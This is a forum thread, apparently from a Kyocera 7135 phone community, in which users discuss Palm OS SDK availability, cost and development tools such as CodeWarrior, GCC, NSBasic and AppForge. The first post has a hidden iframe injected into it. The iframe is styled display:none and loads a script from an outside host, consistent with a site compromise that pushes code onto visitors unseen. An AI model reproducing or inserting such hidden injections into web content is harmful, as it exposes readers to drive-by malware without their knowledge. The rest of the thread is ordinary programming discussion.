+ Reply to Thread

Thread: Sdk?

Sdk?

I understand that the SDK is not out yet. However, I am wondering if I will be able to use it when it is available. Can anyone give me their estimate on:

1) What will be the cost of the SDK?
    2) What programming language is the SDK for palm/phones most like?
    3) I haven't done any programming in years... my experience is prior to C. Although I am pretty computer literate. Would the SDK be usable by a casual user?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

sdk is free, not sure about the rest, but you can use the 6035 sdk to get an idea of what the 7135's will be like..
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Re: Sdk?

The SDKs are oriented toward C/C++, but are not (at least in the past) very complex in and of themselves. The function calls actually live in shared libraries stored in ROM - the SDK is nothing more than C headers and some docs. Any program that can load a library and call its functions will work, you'll just hare to convert the parameter types in the headers to whatever you are using.

Originally posted by DMevis
    I understand that the SDK is not out yet. However, I am wondering if I will be able to use it when it is available. Can anyone give me their estimate on:

1) What will be the cost of the SDK?
    2) What programming language is the SDK for palm/phones most like?
    3) I haven't done any programming in years... my experience is prior to C. Although I am pretty computer literate. Would the SDK be usable by a casual user?

Re: Re: Sdk?

Originally posted by rlwhitt
    The SDKs are oriented toward C/C++, but are not (at least in the past) very complex in and of themselves. The function calls actually live in shared libraries stored in ROM - the SDK is nothing more than C headers and some docs. Any program that can load a library and call its functions will work, you'll just hare to convert the parameter types in the headers to whatever you are using.
    I don't know what their plans are for the 7135 SDK, but NSBASIC built a basic library wrapper for the 6035 SDK. NSBASIC is very similar to Visual Basic, so anyone familier with it should be able to jump right into Palm programming. Of the commercial PALM development environments, I believe it is the least expensive (~$129 if I recall).

Alan

Generic PalmOS Development

SDK for PalmOS 4.x (as well as the 2.x, 3.x, and 5.x) is available through the Palm Developers Website (www.palmsource.com - you will need to sign up as a developer). This site has a wealth of tools including the POSE Palm emulator. If you are in North America, you can also down load the ROMS for each device/family.

The standard commercial software environment is Metrowerk Codewarrior for PalmOS (currently v9.0). Academic version available for $99. No idea on full retail (my wife is my "dealer" - well, the one with the student card - for this type of thing , so I get access to academic prices).

There are GNU licenced toolsets out there as well based around the GCC compiler, and public domain utilities to create the required resource files.

A very good IDE style wrapper for the GCC toolset is available through falch.net - though their prices have started to approach those of Metrowerks. They do have a very good database designer as well. Since the file system behind PalmOS is effectively a database, this is great for doinganything requiring permanent storage.

Other developement environments are out there too, put to the best of my knowledge require a form of "interpreter" or wrapper to be installed on the device along with the app itself (the codewarrior/Falch/GCC path creates standalone code).

Of the "other" environments, two leaders are NSBasic (mentioned previously), and AppForge. Both of these are VB style IDE environments (indeed, I think AppForge requires VB). Advantage of AppForge is that software that you write can be recompiled for multiple platforms (PocketPC and Symbian) with no code changes (though screen sizes will afect visual layouts). Both of these are options for casual programmers.

Also available are Python, an onboard C (TinyC?) interpreter, Java, and a multitude of other environments.

BUT, I am a personal fan of Coewarrior. I am a C junkie. C seems to perform better on these devices than C++ - code is generally tighter (which equates to smaller and faster). I came from a background of programming 370XA IBM Mainframe Assembler, and am far more comfortable designing code in a functional/procedural model than an OO model. YVMV, and probably will.

Kyo Specific Development

If you dig around the Kyo web site, you can get the ROMs and Skins for POSE that let you emulate the device on the desktop.

A 6035 specific SDK is available that extends the PalmOS SDK with Kyo specific functions.

A 7135 SDK has been promised, but is still in the "Coming Soon" category.

What you might like to do (and what I am doing), is use the generic PalmOS 4.1 SDK, emulated on POSE using a generic PalmOS 4.1 device. You will not get the telephony specific functionality (look at the 6035 for the type of thinmgs that will be available). At least you can get the framework for you code working, as well as any interface issues ironed out.

Good luck.

(Hey mods, when the SDK is released - or maybe sooner, how about a "developers corner". Let the coders talk bit and bytes, big endian vs little endian. Let the end users give feedback on what they'd like to see, etc.? Just a thought.)

Re: Kyo Specific Development

I'm all for that!

Originally posted by Token User
    (Hey mods, when the SDK is released - or maybe sooner, how about a "developers corner". Let the coders talk bit and bytes, big endian vs little endian. Let the end users give feedback on what they'd like to see, etc.? Just a thought.)

7135 App Developer davewalthall's Avatar

Re: Generic PalmOS Development

Originally posted by Token User
    There are GNU licenced toolsets out there as well based around the GCC compiler, and public domain utilities to create the required resource files.
    Excellent overview, Token.

I went with the GNU compiler and tools. It was confusing to setup, but I eventually got it to work. I love the utilities, especially things like make. None of it is very graphical, so debugging can be a bit tougher, but you can't beat the price! And I've never found a better editor than emacs. It is the only one that will indent code the way that I want it to.

David
    char *p="char *p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}

Re: Re: Generic PalmOS Development

Originally posted by davewalthall
    Excellent overview, Token.
    No worries. I hope my pain will oneday benefit mankind

Originally posted by davewalthall I went with the GNU compiler and tools. It was confusing to setup, but I eventually got it to work. I love the utilities, especially things like make. None of it is very graphical, so debugging can be a bit tougher, but you can't beat the price! And I've never found a better editor than emacs. It is the only one that will indent code the way that I want it to.
    for PalmOs development, I really like the Codewarrior environment. It is a no brainer to use - and if you can purchase it at the academic price, it is reasonable. I am using v8.0, yet to upgrade to 9.0 (and probably wont - no need for OS 5.0 support for what I do).

Regarding emacs - there is a commetn that could start a holy war . My wife is a fan of vi (she does most of her development in a Unix environment), and my PC based editor of choice is UltraEdit - it has different indenting and highlighting of keywords that is context sensitive (C, Java, HTML, etc all highlight and indent differently). If you are using a PC based GNU toolchain, UltraEdit is just about the perfect programmers editor.